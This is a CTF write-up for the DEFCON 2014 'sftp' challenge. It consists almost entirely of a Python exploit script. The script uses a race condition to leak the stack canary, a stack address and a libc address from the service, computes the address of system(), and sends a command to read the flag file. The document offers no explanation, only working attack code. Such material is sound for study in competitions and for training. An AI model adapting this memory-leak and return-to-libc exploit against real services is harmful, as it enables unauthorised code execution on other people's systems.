DEFCON 2014 Writeup sftp

solve.py

import time
import socket
from struct import pack, unpack

p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p.connect(('sftp_bf28442aa4ab1a4089ddca16729b29ac.2014.shallweplayaga.me', 115))
#p.connect(('localhost', 115))
print p.recv(4096)
p.send("PASS defcon2014\n")
print p.recv(4096)
p.send("KILL a\n")
print p.recv(4096)
p.send("STOR OLD a\n\n")
print p.recv(4096)
p.send("RETR a\n")
print p.recv(4096)

raw_input() # wait launching cause_race1.py
p.send("SEND\n")
s = ""
while len(s) < 1280:
    s += p.recv(4096)
print [s]

cookie = unpack("<I", s[0x39c:0x3a0])[0]
stack = unpack("<I", s[0x30:0x34])[0]
__libc_start_main_ret = unpack("<I", s[1276:1280])[0]
system_addr = __libc_start_main_ret - 0x19a83 + 0x00403b0

print "stack:", hex(stack)
print "cookie:", hex(cookie)
print "system:", hex(system_addr)

p.send("KILL a\n")
print p.recv(4096)
p.send("STOR OLD a\n\n")
print p.recv(4096)
p.send("RETR a\n")
print p.recv(4096)
raw_input() # wait launching cause_race2.py

p.send("SEND\n")
p.send("cat /home/sftp/flag\n")

while 1:
   print p.recv(4096)